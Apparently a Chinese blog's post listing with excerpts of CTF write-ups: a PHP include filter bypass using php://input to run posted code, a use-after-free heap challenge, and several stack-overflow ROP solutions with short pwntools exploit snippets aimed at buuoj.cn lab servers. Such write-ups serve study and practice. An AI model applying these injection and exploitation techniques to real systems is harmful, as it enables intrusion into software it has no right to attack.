- 博客(16)
- 收藏
- 关注
RSS订阅原创 攻防世界|Web_php_include
这里将GET改为POST请求,通过include,php://input让服务器执行post传过去的代码,发现有三个文件,再用cat即可拿到flag。代码直接给出,会过滤掉php://,我尝试过双写,但没有成功,于是我将第一个p大写,成功绕过,bp改包如图。
2023-03-21 22:17:59
146
原创 buu|hitcontraining_uaf 1
hitcontraining_uaf1这里一次会申请两个堆,其中第一个堆放着print_note_content前4个字节位是print_note_content函数地址,这个堆块儿存在了notelist中在执行print_notet时,会调用notelist里存储print_note_content函数地址的堆块儿,及我们只需将notelist里堆块儿存的print_note_content函数地址改成后门函数地址即可申请两个堆块儿释放掉0x10里有两个堆,都是之前存...
2022-07-09 00:58:30
195
原创 buuctf|ciscn_2019_s_3 1
buuctf|ciscn_2019_s_3 1如下图明显的栈溢出这里调用了系统号为0x3B(十进制为59)的函数,查下表是exeve(‘/bin/sh’,0,0),为了控制寄存器使其第一个参数为/bin/sh,其余为0,需要用到csu控制寄存器exp如下from pwn import*#p=process('./pwn_30')p=remote('node4.buuoj.cn',27704)pop_bx_bp_12_13_14_15=0x40059Acsu_2=0x400580s
2022-05-21 21:56:40
337
原创 buuctf|[HarekazeCTF2019]baby_rop 1
buuctf|[HarekazeCTF2019]baby_rop 1分析下载文件重命名为pwn_15,checksec一下只开启了NX,64位,用ida看看这里可以栈溢出,同时在侧面看到了system()shift+F12查看字符串找到binsh,由于是64位,我们要寄存器传参,ROPgadget下exp如下from pwn import*p=remote('node4.buuoj.cn',25977)#p=process("./pwn_15")system_addr=0x
2022-05-02 21:47:30
1026
原创 buuctf|ciscn_2019_en_2 1
ciscn_2019_en_2 1下载后我重命名为pwn_14了checksec一下nx开启,可以栈溢出64位,用ida看看分析下,只有输入‘1’有用,即encrypt函数较为重要,进入encrypt有gets(s),可以进行栈溢出,没有找到后门函数。那基本思路有了,这里可以栈溢出,但要绕过strlen判断,之后就是基本的ROP,ret2libc。exp如下from pwn import*from LibcSearcher import*context(os='linux', ar
2022-05-02 20:58:06
685
原创 buuctf|buuctf|get_started_3dsctf_2016 1
方法一我将文件下载后将其重命名为pwn_13,checksec一下可以直接栈溢出,32位,进入idagets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit()exp如下from pwn import*p=remote('node4.buuoj.cn',26832)context.log_level='debu
2022-05-01 22:39:43
392
原创 buuctf|get_started_3dsctf_2016 1
方法一我将文件下载后将其重命名为pwn_13,checksec一下可以直接栈溢出,32位,进入idagets(v4)可以栈溢出,这里没找到后门函数,只发现了get_flag函数,进去看看只要a1,a2满足值便可以输出flag,a1和a2是函数参数,我们可以进行传入,同时为了让get_flag正常结束,我们要使其返回函数为exit()exp如下from pwn import*p=remote('node4.buuoj.cn',26832)context.log_level='debu
2022-05-01 22:31:45
681
1
原创 buuctf|warmup_csaw_2016 1
buuctf|warmup_csaw_2016 1下载文件运行如下checksec查看下保护file一下,是64位文件拉进ida,发现gets(v5),查看v5,明显的栈溢出找到system,地址40060d直接expfrom pwn import*p=remote('node4.buuoj.cn',28415)payload=b'A'*0x48+p64(0x40060D)p.sendline(payload)p.interactive()得flag...
2022-04-15 22:36:00
1423
3
原创 coffee
文件coffee用jd-gui打开,源码如下import java.io.BufferedReader;import java.io.InputStreamReader;public class coffee { public static String encodeone(String str, int n) { String str1 = null; return str1; } private static final byte[] encodingTabl
2022-03-22 11:22:05
3687
原创 buuctf-rsa_1
我们可以看到两个文件,根据题目,是rsa加密,如果不太了解rsa加密的可以去https://blog.csdn.net/gao131360144/article/details/79966094看看将pub.key用记事本打开得到加密公钥再进入http://www.hiencode.com/pub_asys.html对公钥进行解析,我们便得到了e,n在http://factordb.com/对n进行分解得p,q在这里我们要用到RSA Tool2 by ET!在工具里我们拿到了
2022-03-22 11:01:13
555
原创 攻防世界新——区re
re_1___game直接ida,找到返回flag的函数,跟进,如图根据反编译代码写脚本得flagre_2__open-source源码如下#include <stdio.h>#include <string.h>int main(int argc, char *argv[]) { if (argc != 4) { printf("what?\n"); exit(1); } unsign
2022-03-22 10:50:27
375
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人